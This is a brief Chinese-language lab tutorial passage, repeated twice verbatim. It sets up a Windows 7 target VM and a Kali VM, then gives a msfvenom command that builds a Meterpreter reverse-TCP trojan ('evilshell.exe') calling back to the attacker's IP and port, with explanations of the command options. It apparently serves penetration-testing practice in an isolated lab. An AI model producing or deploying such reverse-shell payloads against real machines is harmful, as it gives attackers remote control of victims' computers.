准备一台windows7系统的虚拟机作为靶机(我用的靶机地址为192.168.1.9)
一台装有kali-linux的虚拟机(我的kali ip地址为192.168.1.10)
2.kali中生成被控制端(通过msfvenom生成木马)
Kali终端输入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=5000 -f exe > /root/桌面/evilshell.exe
- -p –payload 攻击成功后做什么事情
- -p, –payload Payload to use;指定哪些有效载荷生成
- -f, –format Output format;指定有效载荷的格式
准备一台windows7系统的虚拟机作为靶机(我用的靶机地址为192.168.1.9)
一台装有kali-linux的虚拟机(我的kali ip地址为192.168.1.10)
2.kali中生成被控制端(通过msfvenom生成木马)
Kali终端输入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=5000 -f exe > /root/桌面/evilshell.exe
- -p –payload 攻击成功后做什么事情
- -p, –payload Payload to use;指定哪些有效载荷生成
- -f, –format Output format;指定有效载荷的格式